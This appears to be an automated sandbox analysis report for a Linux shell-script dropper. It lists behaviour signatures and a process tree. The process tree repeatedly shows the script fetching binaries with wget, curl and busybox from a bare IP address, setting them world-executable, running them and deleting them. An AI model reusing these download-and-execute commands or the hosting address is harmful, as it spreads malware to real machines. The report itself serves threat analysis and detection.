Analysis Overview
SHA256
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01
Threat Level: Shows suspicious behavior
The file 3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:26
Reported
2024-10-25 01:29
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
18s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
Processes
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/chmod
[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/rm
[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/wget
[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/chmod
[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO
[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/rm
[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/wget
[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/chmod
[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S
[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/rm
[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/wget
[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/chmod
[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME
[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/rm
[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/wget
[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/chmod
[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV
[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/rm
[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/wget
[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/chmod
[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH
[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/rm
[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/chmod
[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal
[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/rm
[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/wget
[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/chmod
[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V
[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/rm
[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/wget
[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/chmod
[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS
[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/rm
[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/wget
[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/chmod
[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm
[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/rm
[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/wget
[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/chmod
[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ
[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/rm
[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/wget
[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/chmod
[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv
[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/rm
[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/chmod
[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8
[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/rm
[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/wget
[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/chmod
[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj
[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/rm
[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/wget
[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/chmod
[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm
[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/rm
[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/wget
[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/chmod
[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ
[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/rm
[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/wget
[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/chmod
[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv
[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/rm
[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/chmod
[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8
[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/rm
[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/wget
[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/chmod
[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj
[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/rm
[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/wget
[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/chmod
[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/rm
[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/wget
[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/chmod
[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO
[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/rm
[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/wget
[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/chmod
[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S
[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/rm
[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/wget
[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/chmod
[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME
[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/rm
[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/wget
[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/chmod
[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV
[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/rm
[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/wget
[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/chmod
[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH
[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/rm
[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/chmod
[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal
[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/rm
[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/wget
